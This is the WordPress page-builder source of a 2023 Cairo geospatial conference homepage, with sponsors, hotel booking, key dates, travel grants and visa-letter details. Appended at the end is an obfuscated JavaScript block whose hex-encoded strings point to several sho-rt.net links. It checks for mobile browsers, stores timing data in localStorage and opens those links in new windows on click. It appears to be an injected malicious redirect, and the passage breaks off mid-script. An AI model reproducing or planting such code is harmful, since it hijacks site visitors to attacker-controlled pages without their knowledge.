style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686320769324{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your Name (as it appears in your passport), PassportNumber ,Nationality and Your Organization .</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 